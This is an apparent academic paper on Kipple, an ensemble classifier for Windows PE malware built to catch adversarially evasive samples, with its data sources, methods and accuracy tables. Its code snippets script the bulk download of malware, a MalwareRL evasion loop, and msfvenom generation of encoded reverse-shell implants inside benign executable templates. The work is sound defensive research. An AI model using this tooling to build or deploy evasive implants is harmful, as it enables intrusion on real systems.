Kipple: Towards accessible, robust malware classification

Andy Applebaum∗
The MITRE Corporation†

∗ aapplebaum@mitre.org
† The author's affiliation with The MITRE Corporation is provided for identification purposes only and is not intended to convey or imply MITRE's concurrence with, or support for, the positions, opinions, or viewpoints expressed by the author. Approved for Public Release; Distribution Unlimited. Public Release Case Number 21-3931. Copyright © 2021 The MITRE Corporation. Use permitted under Creative Commons License Attribution 4.0 International (CC BY 4.0).

Proceedings of the Conference on Applied Machine Learning for Information Security, 2021

Abstract

The past few decades have shown that machine learning (ML) can be a powerful tool for static malware detection, with papers today still purporting to eke out slight accuracy improvements. At the same time, researchers have noted that ML-based classifiers are susceptible to adversarial ML, whereby attackers can exploit underlying weaknesses in ML techniques to specifically tailor their malware to evade these classifiers. Defending against these kinds of attacks has proven challenging, particularly for those not steeped in the field. To help close this gap, we have developed Kipple, a Windows Portable Executable (PE) malware classifier designed to detect attempts at evasion. Kipple uses a portfolio of classifiers, building on a primary classifier designed to detect "normal" malware by attaching classifiers designed to detect specific types of adversarial malware. While simplistic, this approach is able to make it significantly harder – though not impossible – to bypass the primary classifier. This paper reports on our process developing Kipple, specifically highlighting our methodology and several notable conclusions, including how our ensemble approach outperforms one using simple adversarial retraining, along with other performance notes. Our hope in publishing this paper is to provide an example defense against adversarial malware, and also to more broadly make the field more accessible to newcomers; towards this larger goal, we include a set of "lessons learned" for newcomers to the field, as well as an open-source software release containing Kipple's models, the data it was built from, and various scripts used to help generate it.

1 Introduction

Static detection of malware files is an ongoing area of research within the security community. While traditionally an "old-school" approach, static detection offers many advantages, principally that by scanning files to see if they are malicious we can quarantine them before they execute and run malicious commands. Early malware detection approaches were simple, originally keying off of known details about a file, such as its MD5 hash or known malicious strings held in its binary representation. Today, more modern approaches use various machine learning (ML) techniques to perform more advanced static detection.

Unfortunately, ML algorithms and technologies can be susceptible to adversarial examples, wherein an adversary perturbs an input object in a way that keeps the object semantically consistent (i.e., it is still the same) but the classifier is no longer able to properly identify it. Much of the research in this space has focused on computer vision as the exemplar domain, but the research community has, over the past few years, also looked at how it can apply to malware detection. For example:
• Rosenberg et al. [18] propose to generate adversarial malware by using explainable artificial intelligence (AI), identifying what features should be perturbed to make a sample evasive.
• Li et al. [13] generate adversarial Android malware by using generative adversarial networks (GANs), bypassing previously proposed defenses.
• Hu and Tan [11] show how to attack a recurrent neural-network (RNN) based malware classifier by substituting a victim classifier and generating adversarial examples against it.

Many others abound in the literature as well – including many with accompanying open source code. Unfortunately, defenses against these attacks are limited: both conceptually, in that there is no clear way to defend against adversarial example attacks, and practically, in that there are more papers purporting to attack models than to defend them. Moreover, in browsing the open source availability, we find that there has been little code – or models – published to help defenders secure their systems against these kinds of attacks. This is problematic, and shows the asymmetric capabilities around and/or interest in defending ML-based classifiers.

In this paper, we seek to bridge this gap, walking through our own attempts to build a robust malware classifier we term "Kipple". While our approach is imperfect, we believe that by increasing the amount of discourse in this space, publishing lessons learned for newcomers, and highlighting potential areas for future research, we can help advance the state of the art in defending against evasive malware. Additionally, we have publicly released our code, data, and models online: https://github.com/aapplebaum/kipple.

2 Overview

Kipple originated as a small personal project entered into the 2021 Machine Learning Security Evasion Competition (MLSEC)1. The competition features a "defender" and an "attacker" track: in the former, participants submit ML models designed to detect malicious Windows Portable Executable (PE) files, and in the latter, participants seek to evade the user-submitted classifiers by leveraging obfuscation and adversarial ML techniques. For submission into the defender track, the goal is to build a classifier that achieves no more than a 1% false positive rate and no more than a 10% false negative rate on normal malware, while minimizing the number of evasions in the attacker track.

Because Kipple was implemented as a side project, the initial effort was small, running only on a personal computer and having the ultimate goal of merely submitting an entry regardless of its performance. Originally the impetus for Kipple was to leverage ideas from differential privacy as a defense against adversarial examples [15], but this early approach was dropped after poor performance testing against normal malware2.

Instead, we adopted a more straightforward hypothesis: many adversarial malware construction techniques are easily distinguishable from traditional benign and malicious Windows PE files, and if we create an ensemble classifier consisting of a traditional malware classifier and a set of classifiers designed to detect adversarial malware, we can greatly increase the efficacy of the initial classifier. With this approach, the adversarial examples we train on need not specifically evade our initial classifier; rather, we can generate many instances of adversarially generated examples and train new classifiers on those. To implement this, our approach worked as follows:

1. Create an initial classifier designed to detect "normal" malware;
2. Create a set of adversarial malware, using a variety of approaches and resources to do so;
3. Produce a separate classifier for each set of adversarial malware; and
4. Create an ensemble classifier leveraging the initial classifier and each adversarial classifier.

In the remainder of this paper, we walk through our process for each step, starting with data creation and identification, building and testing the initial classifier, and then creating the separate and ensemble classifiers. As part of this last step, we walk through the different performance results for each of the different options we investigated for our ensemble.

1 https://mlsec.io/
2 A longer write-up on this approach and its shortcomings is left for future work.

3 Data

This section covers the data used to generate and test Kipple, breaking it down by source. Broadly speaking, we consider two primary classes of data: samples obtained from external sources – termed "original samples" – and samples generated as part of adversarial example construction, frequently referred to as "variants". Within both sets, most of the samples were known to be either benign or malicious, although a small portion of the original sample data was unlabeled. The rest of this section discusses the source, count, and methodology for generating the data, with Table 1 providing summary statistics for the normal/original/non-adversarial samples, and Table 2 providing summary statistics for the adversarially generated samples/variants.

Table 1: Number of samples per data source for existing/external data sets.
Source | Format | Label | Training Size | Testing Size | Count
EMBER | Feature Vector | Malware | 300000 | 100000 | 400000
VirusShare | Binaries | Malware | N/A | N/A | 7662
SoReL | Binaries | Malware | N/A | N/A | 31914
MLSEC 2019 | Binaries | Malware | N/A | 50 | 50
MLSEC 2020 | Binaries | Malware | N/A | 50 | 50
MLSEC 2021 | Binaries | Malware | N/A | 50 | 50
EMBER | Feature Vector | Unknown | 200000 | N/A | 200000
EMBER | Feature Vector | Benign | 300000 | 100000 | 400000
Local | Binaries | Benign | 2191 | 379 | 2570
MLSEC 2019 | Binaries | Adversarial | N/A | 544 | 544

3.1 Original Samples

We leverage the 2018 EMBER3 data set [1] as the core data for our approach. This data includes feature vectors for 1 million PE files scanned in or before 2018, categorized by whether the file was benign, malicious, or unknown. The EMBER data set provides a solid base to build a classifier from, but because it is provided as feature vectors and not as binaries themselves, our ability to construct a more robust classifier from the EMBER data is limited. To remediate this, we look to external sources to provide binaries which can be used to construct adversarial malware.

3 https://github.com/elastic/ember

3.1.1 VirusShare

We first investigated the free VirusShare platform4 as a source for original malware samples. While the platform offers bulk downloads, due to size limitations – discussed further in Section 7 – we opted to use the website's API to obtain individual samples one at a time. This option required us to specify an MD5 or SHA256 value for the sample we wanted; to get a list of relevant hashes, we consulted the EMBER data set, resulting in us downloading the actual samples referenced by EMBER. Unfortunately, the API limits requests to one malware sample every 15 seconds; ultimately, after a period of a few weeks we were able to obtain roughly 7500 samples in total.

4 https://virusshare.com/
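To make this workflow concrete, the following is a minimal sketch of the hash-driven, rate-limited download loop, assuming the EMBER 2018 metadata has been built locally with the ember package. The actual VirusShare request is left behind a hypothetical download_sample helper, since the endpoint and API-key handling should be taken from the VirusShare API documentation.

    import time
    import ember  # https://github.com/elastic/ember

    def download_sample(sha256: str) -> bytes:
        """Hypothetical wrapper around the VirusShare API; see the VirusShare
        documentation for the actual endpoint and API-key parameters."""
        raise NotImplementedError

    # The EMBER metadata includes a sha256 and a label for every sample
    # (1 = malicious, 0 = benign, -1 = unlabeled in the 2018 release).
    metadata = ember.read_metadata("ember2018/")
    malicious_hashes = metadata[metadata["label"] == 1]["sha256"].tolist()

    for sha256 in malicious_hashes:
        try:
            data = download_sample(sha256)
            with open(f"virusshare/{sha256}", "wb") as handle:
                handle.write(data)
        except Exception:
            pass  # the sample may simply not be hosted on VirusShare
        time.sleep(15)  # respect the one-sample-per-15-seconds limit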
3.1.2 SoReL

The SoReL5 data set [10] contains the features and metadata of roughly 20 million different PE files, half of which are malware and the other half benign. In addition to feature vectors, SoReL also provides several pretrained models and, most importantly for our work, access to the roughly 10 million malware instances for download. We do note, however, that as a precaution the SoReL authors modified the hosted binaries to be non-executable, potentially altering each instance's representation and features.

Unfortunately, due to local space constraints, downloading the feature vectors provided by SoReL was prohibitive – when compressed, the features take up roughly 72GB of disk space, with the malware instances themselves requiring 8TB of space. While the features themselves are not particularly prohibitive for consumer hardware, design decisions made when provisioning the Kipple training machine prevented downloading them at the time; moreover, training a model that makes use of all of the SoReL data could prove difficult using consumer hardware. Instead, we took a simple approach of randomly downloading malware instances one at a time. Through this process, we were able to acquire roughly 32,000 malware instances, with delays from self-imposed and external factors including rate limiting and download speeds.

5 https://github.com/sophos-ai/SOREL-20M

3.1.3 Local Files

We were able to pool together roughly 2600 benign files from the author's personal computer that were accumulated over a period of ten or so years. These files were used primarily for developing adversarial examples in the next section and were not used for actual training; the training/testing split in Table 1 reflects which files were used for adversarial example construction.

3.1.4 MLSEC Data

As an entry into MLSEC 2021, we obtained three small labeled data sets:

• MLSEC 2019 data, including 50 normal malware instances used during the 2019 challenge, and 545 malware variants submitted by contestants during the competition.
• MLSEC 2020 data, including 50 normal malware instances used during the 2020 challenge.
• MLSEC 2021 data, including 50 normal malware instances used for the 2021 challenge.

None of these files were used for training, with the 2019 data serving as the primary accuracy metric for Kipple during development.

3.2 Adversarially Generated Samples

We took three different approaches to generate adversarial malware samples; for two of these three, we leveraged public libraries designed to create adversarial examples against ML-based malware classifiers. For the third, we leveraged prior research looking at evading ML classifiers using more traditional obfuscation techniques.
Table 2: Number of samples per data source and generation technique for adversarial malware. Note that all samples are binaries and malicious.
Source | Generation Technique | Training Size | Testing Size | Count
SoReL | MalwareRL | 37053 | 500 | 37553
SoReL | GAMMA | 4651 | 516 | 5167
SoReL | DOS Manipulation | 2331 | 259 | 2590
SoReL | Small Pad | 125 | 100 | 225
SoReL | Large Pad | 177 | 100 | 277
VirusShare | MalwareRL | 24081 | 500 | 24581
VirusShare | GAMMA | 5066 | 563 | 5629
VirusShare | DOS Manipulation | 2533 | 281 | 2814
VirusShare | Small Pad | 2112 | 235 | 2347
VirusShare | Large Pad | 2533 | 282 | 2815
msfvenom | No Added Code | 5296 | 588 | 5884
msfvenom | Added SoReL | 32633 | 1000 | 33633
msfvenom | Added VirusShare | 6852 | 762 | 7614
MLSEC 2019-2021 | MalwareRL | 0 | 1433 | 1433
MLSEC 2019-2021 | SecML Malware | 0 | 746 | 746

3.2.1 MalwareRL

Our first approach leverages the MalwareRL [4] open source software package6. This package is an extension of prior work in [2], which originally sought to create a framework to develop reinforcement learning-based agents that can modify malware to make it evade an ML-based classifier; the updated MalwareRL package retains much of the functionality of the original package, updating it to use a newer version of Python and newer libraries, adding actions, and providing better maintenance. The core idea of MalwareRL is that we can chain together small modifications to PE files in such a way as to make them evasive, with the goal being to create intelligent agents that are able to efficiently select action chains. Out of the box, MalwareRL includes an implementation of 16 file-modification actions, an agent that makes decisions randomly, and an implementation of the MalConv [17] detection model as specified in [1]. During a trial, the MalwareRL environment will randomly select a malware instance and apply modifications as per the agent's decision mechanism, stopping if too many modifications are made or if the modified sample evades the classifier.

We ran MalwareRL off and on over a period of a month using the included random agent and MalConv classifier. As input, we provided the VirusShare and SoReL binaries downloaded in the prior section. Additionally, we leveraged the local benign "train" data as input to several of MalwareRL's actions (e.g., the add_section_strings action used strings from our local data). During each trial, if the agent was able to successfully evade the classifier, we would save the file. To prevent some over-fitting, we recorded at most about 10 different evasive variants per sample7. The final counts for each of the VirusShare and SoReL data sets are listed in Table 2 with "MalwareRL" as the generation technique. Note that due to project constraints, we did not save the list of modifications used for each trial.

6 https://github.com/bfilar/malware_rl
7 This cutoff changed throughout the project, both to be higher and to be lower, but hovered around 10.
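As a rough illustration of how the generation loop is driven, the sketch below shows a random-agent episode loop against a gym-style environment like the one MalwareRL exposes. The import that registers the environments, the environment id, and the reward convention are assumptions made for illustration; the MalwareRL README documents the actual names and how to recover the modified binary.

    import gym
    import malware_rl  # noqa: F401  (assumed: importing registers the environments)

    # Illustrative environment id targeting the bundled MalConv model;
    # check the MalwareRL README for the ids it actually registers.
    env = gym.make("malconv-train-v0")

    for episode in range(1000):
        observation = env.reset()  # the environment samples a malware binary
        done = False
        while not done:
            action = env.action_space.sample()  # random file modification
            observation, reward, done, info = env.step(action)
        if reward > 0:  # assumed convention: positive reward indicates evasion
            # Persist the modified, now-evasive binary for later training; we
            # also capped the number of saved variants per original sample (~10).
            pass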
3.2.2 SecML Malware

Like MalwareRL, the SecML Malware [6] package is designed to provide functionality to create adversarial attacks against Windows PE malware detectors8. SecML Malware differs, however, in that its attacks are end-to-end and are not intended to be chained together, providing a variety of different white-box and black-box attacks. To use the library, users need only provide the input malware and some benign samples to build from, with the package able to construct adversarial examples from there. By default, SecML Malware attacks an included instance of MalConv, similar to MalwareRL. We leverage three classes of attacks from the package:

• GAMMA attacks [8], including both the shift and section injection attacks;
• DOS manipulation [7], defaulting to partial as opposed to full; and
• Padding attacks [12], including a "smaller" version that pads a random number of bytes less than 100, and a "larger" version that pads a random number of bytes less than 1000.

We ran SecML Malware off and on over a period of a month using the above attacks against the default MalConv classifier. As input, we provided the VirusShare and SoReL binaries, leveraging the local benign "train" data as goodware, similar to MalwareRL. Unlike MalwareRL, we saved each resulting sample regardless of whether it was evasive. Anecdotally, we saw that the padding attacks were not producing effective results, and we stopped generating padding examples partway through our generation process.

3.2.3 msfvenom

MalwareRL and SecML Malware are both designed to modify PE files to make them evade classifiers; while these approaches are effective, we also wanted to investigate hardening our model with more obfuscated malware instances and techniques. Towards this, we decided to build on prior work in [3], which created evasive implants by leveraging the open source msfvenom utility9. We followed a similar approach, randomly choosing parameters based on the values in Table 3, with our local benign training examples as templates, and embedding either no code, a VirusShare instance, or a SoReL instance of malware. While prior work suggested the use of templates would make the resulting implants evasive, we believed that including the malware instances as "added code" would make it easier for the classifier to detect the implant, and would also make the data more robust from a training perspective.

Table 3: Parameters used for implant generation; variation based on architecture not shown.
Field | Parameters
Platform | Windows
Architectures | x86, x64
Encoders | none, xor, xor_dynamic, shikata_ga_nai
Encryption | none, aes256, base64, rc4, xor
Payload | shell/bind_tcp, meterpreter/reverse_tcp, meterpreter/bind_tcp
Template | Local benign train data
Added Code | None, VirusShare, SoReL

8 https://github.com/pralab/secml_malware
9 https://www.offensive-security.com/metasploit-unleashed/msfvenom/
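As a rough sketch of this generation step, the snippet below randomly samples the parameters in Table 3 and assembles an msfvenom command line. The flag spellings reflect common msfvenom usage (the --encrypt option requires a relatively recent Metasploit release), the paths and connection parameters are placeholders, the architecture is fixed to x86 for brevity, and the "added code" embedding step is omitted.

    import random
    import subprocess

    # x86 encoder names corresponding to the Table 3 options; the x64 variants differ.
    ENCODERS = [None, "x86/xor", "x86/xor_dynamic", "x86/shikata_ga_nai"]
    ENCRYPTION = [None, "aes256", "base64", "rc4", "xor"]
    PAYLOADS = [
        "windows/shell/bind_tcp",
        "windows/meterpreter/reverse_tcp",
        "windows/meterpreter/bind_tcp",
    ]

    def build_command(template_path: str, out_path: str) -> list:
        """Randomly sample Table 3 parameters and build an msfvenom invocation."""
        cmd = ["msfvenom", "--platform", "windows", "-a", "x86",
               "-p", random.choice(PAYLOADS), "LHOST=127.0.0.1", "LPORT=4444",
               "-x", template_path,  # local benign PE used as a template
               "-f", "exe", "-o", out_path]
        encoder = random.choice(ENCODERS)
        if encoder:
            cmd += ["-e", encoder]
        encryption = random.choice(ENCRYPTION)
        if encryption:
            cmd += ["--encrypt", encryption]
        return cmd

    # Placeholder paths for one generated implant.
    subprocess.run(build_command("benign/template.exe", "implants/implant.exe"), check=True)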
3.3 Building Test Sets

We originally intended to split each data set generated in Section 3.2 into a set of samples used for "training" and a set of samples used for "testing," with the latter being the primary performance metric to evaluate each model. This split is illustrated in Table 2. Unfortunately, in practice the split was challenging to execute: as it turns out, almost all new models trained on the adversarially generated variants scored 100% on the test data. After some analysis we saw that this was due to overlap between the test and training data: while no sample itself was present in both sets, it was often the case that an original sample had distinct but similar variants in each, and thus many classifiers were indirectly exposed to some of the testing data during the training phase.

To remediate this, we created two additional data sets used specifically for testing, represented in the last two rows of Table 2. Both data sets leveraged the MLSEC 2019, 2020, and 2021 normal malware samples as the starting malware; because none of the classifiers were trained on this data, there was no chance for pre-identification of the variants. In the first set, termed MLSEC MalwareRL, we leveraged the MalwareRL framework to construct a small set of 1433 variants of the original MLSEC samples. In the second set, termed MLSEC SecML Malware, we leveraged the SecML Malware library to build a set of 746 variants, including the GAMMA, DOS manipulation, and padding approaches.

4 Testing and Building a Base Model

We built a base model following the most recent EMBER code and publication [16], using a gradient boosted decision tree (GBDT) implemented in LightGBM10 (LGBM). For our base model, we only used the EMBER malicious and benign training sets, choosing parameters similar to those in [16]11. We fix the threshold for our model to 0.85, using the EMBER benign test data to match the 1% false positive rate required for submissions to the MLSEC defender track.

10 https://lightgbm.readthedocs.io/en/latest/Python-Intro.html
11 Unfortunately the exact configuration was lost, but we believe it is the same as the source on slide 16, with a lower number of leaves.

Table 4 shows the accuracy of our model for each of the original sample data sets.

Table 4: Accuracy for the base model against original samples at a ~1% false positive rate.
Source | Label | Number Correct | Total Samples | Accuracy
EMBER Test | Benign | 99019 | 100000 | 99.0%
Local | Benign | 2509 | 2570 | 97.6%
EMBER Test | Malware | 96486 | 100000 | 98.5%
VirusShare | Malware | 7651 | 7662 | 99.9%
SoReL | Malware | 28809 | 31914 | 90.3%
MLSEC 2019 | Malware | 50 | 50 | 100%
MLSEC 2020 | Malware | 49 | 50 | 98%
MLSEC 2021 | Malware | 50 | 50 | 100%
MLSEC 2019 | Adversarial | 293 | 544 | 53.8%
MLSEC MalwareRL | Adversarial | 811 | 1433 | 56.6%
MLSEC SecML Malware | Adversarial | 570 | 746 | 76.4%

Looking at the benign data, we see that we hit 99% accuracy for the EMBER data as expected given our threshold, but only 97.6% for the local benign data; we suspect this slight drop is due to the nature of the local binaries, as some of them included author-written code and other academic files. Looking at malware, we can see the classifier has fairly strong results, correctly classifying 98.5% of the EMBER test malware, 99.9% of the VirusShare malware, and missing only one out of the 150 MLSEC base malware files. The SoReL malware proves much more interesting: even without any obfuscation, the classifier is only able to correctly identify 90.3% of the instances. While this meets our 10% false negative goal, it still falls short relative to the other sets.
We posit this may be due to the model being poor in general, the SoReL malware being particularly hard to classify (i.e., significantly different from the EMBER training data due to it being more recent), or the modifications made to the SoReL binaries to render them non-executable causing them to appear benign.

The last data sets are the adversarial samples. Here, the classifier performs poorly on both the MLSEC 2019 adversarial malware and the MLSEC MalwareRL variants, correctly identifying 53.8% of the former and 56.6% of the latter. While the classifier performs better on the MLSEC SecML Malware set – identifying 76.4% of the samples – the poor performance on the other sets indicates that while the base classifier may be strong against "normal" malware, it's likely susceptible to adversarially crafted ones. We note that the better performance on the SecML Malware set is likely due to the ease with which the classifier can identify some of the individual SecML Malware attacks.

Indeed, this conclusion is reinforced by looking at Table 5, which reports the accuracy of our base classifier against the new samples we generated in the previous section.

Table 5: Accuracy for the base model against the adversarially generated samples.
Source | Generation Technique | Number Correct | Total Samples | Accuracy
SoReL | MalwareRL | 22102 | 37553 | 58.9%
SoReL | GAMMA | 3079 | 5167 | 59.6%
SoReL | DOS Manipulation | 2312 | 2590 | 89.2%
SoReL | Small Pad | 214 | 225 | 95.1%
SoReL | Large Pad | 260 | 277 | 93.9%
VirusShare | MalwareRL | 20512 | 24581 | 83.4%
VirusShare | GAMMA | 4547 | 5629 | 80.8%
VirusShare | DOS Manipulation | 2803 | 2814 | 99.6%
VirusShare | Small Pad | 2337 | 2347 | 99.6%
VirusShare | Large Pad | 2805 | 2815 | 99.6%
msfvenom | No Added Code | 639 | 5884 | 10.9%
msfvenom | Added SoReL | 7643 | 33633 | 22.7%
msfvenom | Added VirusShare | 1847 | 7614 | 24.3%

First, looking at the bottom of the table, we can see that the base classifier is very weak against the msfvenom samples, only correctly classifying 10.9% of the ones generated without added code. Contrary to our expectations, we don't see that adding code makes it much easier for the classifier to identify the implant, scoring only 22.7% accuracy when a SoReL sample is added, and 24.3% accuracy when a VirusShare sample is added. While highlighting a significant gap in our classifier, this does align with the conclusion from prior work suggesting the msfvenom template option was particularly effective as an evasion technique.

Moving up the table, we see the classifier perform reasonably well on the VirusShare examples, identifying the DOS Manipulation and both padding techniques at nearly 100%. The GAMMA attack is the strongest of the five, with the classifier correctly identifying only 80.8% of the instances; the MalwareRL approach is second-strongest, at 83.4% accuracy.

The SoReL examples prove more problematic for the classifier. First, for the MalwareRL case, we see it correctly identify only 58.9% of the samples – a much lower value than for VirusShare. GAMMA is nearly as effective, with the classifier only identifying 59.6% of the samples. The DOS Manipulation case is not as dire, with the classifier spotting 89.2% of the cases, and the two padding cases both show improvement over the prior three, although not nearly as much as for the VirusShare case.

One interesting trend apparent from looking at the SoReL and VirusShare cases is how much better the classifier performs on the latter. This can be explained by examining the methodology behind gathering the samples: the SoReL data were selected randomly, whereas the VirusShare data were selected by pulling hashes from the EMBER data. Thus, it's likely that the classifier was indeed trained on the original malware samples underlying those variants, and thus might be more familiar with the adversarial ones.
If this is the case, it shows an interesting potential gap in detection – we would expect the VirusShare GAMMA and MalwareRL accuracies to be higher if indeed the classifier was trained on the underlying unmodified malware; 80% accuracy on adversarial examples perturbed from data the classifier was trained on seems rather low. As one last stray observation, we note that the MalwareRL and SecML Malware samples were all generated targeting the MalConv classifier, one that uses a completely different architecture than our base model, though one that does use the same training data. Still, looking at the SoReL case, we find it interesting that so many of the MalwareRL samples transferred from the MalConv classifier to our GBDT one (which correctly identified only 58.9% of them). We believe that this ease of transferability can have implications for future ML-based detection approaches.

5 Model Development

In this section we discuss how we build on the base model to make it more robust to adversarial attacks, focusing on the different options tested and the performance of each. This includes a model using adversarial retraining, individual models built from the EMBER data set and the new adversarial samples, and different portfolio options that leverage multiple models. Table 6 shows the final results for each model.

5.1 Retraining

Our first defensive approach is to try adversarial retraining. In this approach, we leverage a GBDT similar to the one in Section 4, with 1000 iterations, 1024 leaves, a bagging and feature fraction of 0.5, and a learning rate of 0.005. We then train the classifier with the following data:

• The original EMBER benign data as benign;
• The original EMBER unknown data discarded;
• The original EMBER malware data as malicious; and
• All new adversarial samples as malicious.

As in Section 4, we set a cutoff to ensure only 1% false positives on the EMBER test data, using a threshold of 0.75.

The second row (labeled Retrained) within Table 6 shows the results for the retrained model. Here, we see some initial loss of performance relative to the base model: we have a lower accuracy for the local benign data set, a lower accuracy for the EMBER test malware set, and a lower accuracy for the MLSEC malware data. However, we do see a pronounced increase of ~20% accuracy across each of the 2019, MalwareRL, and SecML Malware adversarial test sets. Whether this increase is worth the small decrease – ~4% – on normal malware is likely application-dependent, though in most cases it would seem that the additional coverage is likely worth the small performance hit.
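For reference, the following is a minimal sketch of this retraining setup in LightGBM. It assumes the EMBER 2018 features have been vectorized locally with the ember package, and the path to the cached feature vectors of our adversarial variants is a placeholder.

    import ember
    import lightgbm as lgb
    import numpy as np

    # EMBER 2018 vectorized features; y is -1 (unknown), 0 (benign), or 1 (malicious).
    X, y = ember.read_vectorized_features("ember2018/", subset="train")
    keep = y != -1                     # the unknown rows are discarded
    X, y = X[keep], y[keep]

    # Cached feature vectors for the adversarially generated variants (placeholder
    # path); all of them are labeled malicious.
    X_adv = np.load("features/variants.npy")
    X_train = np.vstack([X, X_adv])
    y_train = np.concatenate([y, np.ones(len(X_adv))])

    params = {
        "objective": "binary",
        "num_leaves": 1024,
        "learning_rate": 0.005,
        "bagging_fraction": 0.5,
        "feature_fraction": 0.5,
    }
    model = lgb.train(params, lgb.Dataset(X_train, label=y_train), num_boost_round=1000)

    # Calibrate the decision threshold so roughly 1% of the EMBER benign test data
    # scores above it; for this retrained model that works out to about 0.75.
    X_test, y_test = ember.read_vectorized_features("ember2018/", subset="test")
    benign_scores = model.predict(X_test[y_test == 0])
    threshold = np.percentile(benign_scores, 99)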
Table 6: Accuracy for each setup in Section 5, with each row representing a model and each column representing a data set. Note that each row/model has an accuracy of 99% on the EMBER benign test data.
Row | Model Name/Composition | Benign: Local | Malware: EMBER | Malware: MLSEC | Adversarial MLSEC: 2019 | Adversarial MLSEC: Mal-RL | Adversarial MLSEC: SecML
1 | Base | 97.6% | 98.5% | 99.3% | 53.8% | 56.6% | 76.4%
2 | Retrained | 78.0% | 94.4% | 96.7% | 76.7% | 84.0% | 86.6%
3 | adversarial-all | 41.7% | 4.3% | 16.0% | 52.6% | 60.3% | 47.9%
4 | adversarial-benign | 40.1% | 53.8% | 77.3% | 86.6% | 84.3% | 88.6%
5 | variants-all | 95.3% | 9.3% | 43.3% | 78.3% | 89.9% | 71.6%
6 | variants-benign | 95.5% | 60.6% | 87.3% | 88.2% | 91.0% | 94.4%
7 | msf-all | 29.3% | 0.4% | 4% | 8.1% | 4.9% | 15.8%
8 | msf-benign | 24.5% | 6.7% | 50.7% | 20.4% | 35.5% | 59.4%
9 | undetect-all | 21.6% | 0.4% | 46.7% | 15.6% | 39.4% | 55.0%
10 | undetect-benign | 72.3% | 0.6% | 4.0% | 0.6% | 2.6% | 8.7%
11 | Base, adversarial-all | 41.7% | 96.0% | 100% | 83.1% | 66.4% | 94.6%
12 | Base, adversarial-benign | 41.4% | 96.0% | 100% | 86.0% | 70.6% | 96.2%
13 | Base, variants-all, msf-all | 37.5% | 94.7% | 96.7% | 88.0% | 84.9% | 95.0%
14 | Base, variants-all, msf-benign | 36.4% | 95.3% | 98.7% | 88.6% | 84.2% | 95.7%
15 | Base, variants-benign, msf-all | 37.5% | 95.6% | 100% | 88.6% | 78.3% | 95.0%
16 | Base, variants-benign, msf-benign | 28.5% | 93.9% | 98.7% | 90.8% | 81.1% | 95.2%
17 | Base, variants-all, undetect-all | 28.8% | 92.5% | 93.3% | 91.7% | 89.0% | 95.9%
18 | Base, variants-all, undetect-benign | 70.5% | 92.7% | 92.0% | 89.3% | 85.2% | 95.0%
19 | Base, variants-benign, undetect-all | 28.8% | 95.6% | 100% | 91.0% | 84.5% | 99.3%
20 | Base, variants-benign, undetect-benign | 70.5% | 95.7% | 100% | 88.6% | 78.8% | 97.2%

5.2 Individual Models

Our second approach is to develop a set of individual models that do not label the EMBER set the same as the adversarial set. We specifically choose one of two paradigms for these models:

• All. Under this approach, we consider all EMBER data as benign, and all new adversarial samples as malicious. This approach assumes that our new variants will have different signatures than the existing malware and benign data.
• Benign. Under this approach, we only consider the benign EMBER data as benign, ignoring all others (i.e., malicious, unknown). This approach specifically tries to construct a classifier that distinguishes between benign files and adversarial malware, without any training on normal malware.

Within these two categories, we create four different variations on the set of training data we want to use for adversarial samples:

• Adversarial. This set includes all adversarial samples.
• Variants. This set includes all samples generated with MalwareRL and SecML Malware.
• msf. This set includes all of the msfvenom samples.
• undetect. This set only includes the msfvenom samples that were flagged as benign by the Base classifier in Section 4.

This results in 8 different models, each of which is trained as a GBDT, with the adversarial and variants cases using the same parameters as the Retrained model and the msf and undetect cases modifying the number of leaves to 512 and the number of iterations to 500. We further fix each model's threshold to match the minimum needed to score a 1% false positive rate on the EMBER test data.
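To make the two labeling paradigms concrete, the sketch below shows how the training set for any one of the eight models can be assembled; the array names are placeholders for the EMBER feature matrix, its labels, and the featurized adversarial subset in question.

    import numpy as np

    def build_training_set(X_ember, y_ember, X_adv, paradigm):
        """Assemble features and labels for one individual model.
        paradigm="all":    every EMBER sample (benign, malicious, unknown) -> label 0
        paradigm="benign": only the benign EMBER samples are kept          -> label 0
        The adversarial samples (X_adv) are always labeled 1."""
        if paradigm == "all":
            X_negative = X_ember
        elif paradigm == "benign":
            X_negative = X_ember[y_ember == 0]
        else:
            raise ValueError(paradigm)
        X = np.vstack([X_negative, X_adv])
        y = np.concatenate([np.zeros(len(X_negative)), np.ones(len(X_adv))])
        return X, y

    # For example, the variants-benign model would train on:
    # X, y = build_training_set(X_ember, y_ember, X_variants, paradigm="benign")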
Interestingly, the undetect category does not follow this pattern, with the all case outperforming the benign case. We posit this may be due to the undetect samples appearing more like benignware – since they evaded the Base classifier – and thus the all case better discriminates between normal PE files and PE files designed specifically to look benign. Looking at the best case for each model type – focusing on “benign” for adversarial, variants, and msf, and on “all” for undetect – we see that msf and undetect perform the worst, performing quite poorly on the EMBER malware test set (6.7% for msf and 0.4% for undetect) and under- performing the Base classifier for each adversarial set. Both classifiers also score poorly with the local benign data (2̃0% accuracy each) likely due to some of the local benign files having some variations present in both the test and train data12 This idea is corroborated by looking at the variants and adversarial local benign scores as well: variants correctly identifies 95.5% of them, and adversarial falls in the middle at 40.1%. On the other end of the spectrum, variants-benign is clearly the strongest, scoring highest for EMBER malware, MLSEC malware, and even the adversarial MLSEC data. Indeed, this classifier by itself is almost able to hit the 10% false negative threshold for that data. As runner-up, adversarial-benign is a little less performant, having a lower accuracy across each data set but falling within a reasonable 2% of variants-benign on the adversarial MLSEC 2019 data. 5.3 Portfolio Approaches Moving past individual models, we investigate whether we can use a “portfolio” of models, focusing on a few combinations. Here, we set a threshold for each model in the portfolio; if at least one model flags a file as malicious, we record malicious. If none classify it as malicious, then we score it as benign. To set each model’s threshold, we look at all threshold combinations that ensure that the total false positive rate is 1%13 ; then, we find the best pair (or, if a portfolio of three models, the best triple) to maximize the detection rate for the MLSEC data, ensuring we the thresholds score at least 90% for the EMBER malware set. Rows 11 through 20 of Table 6 show the results for our portfolio arrangement. We only test two portfolios of size two: the Base model along with either adversarial-all or adversarial-benign. These two portfolios score roughly equally, with the benign configuration slightly outperforming the all configuration for the adversarial MLSEC samples. Notably, both portfolios offer benefits over their singleton counterparts: versus the Base profile by itself, each portfolio option provides much stronger coverage of the adversarial MLSEC data, at a cost of only a few percentage points off of the EMBER malware set. However, the portfolio does struggle with the local benign data, likely due to the included msfvenom data. Against the adversarial singletons, the portfolios perform much better across the board, with only the adversarial-benign case scoring near the portfolio for the adversarial MLSEC data. The last 8 rows of Table 6 correspond to the eight portfolios of size three that we tested. Here, each portfolio includes the Base profile along with a version of the variants model and either a version of the msf model or a version of the undetect model. 
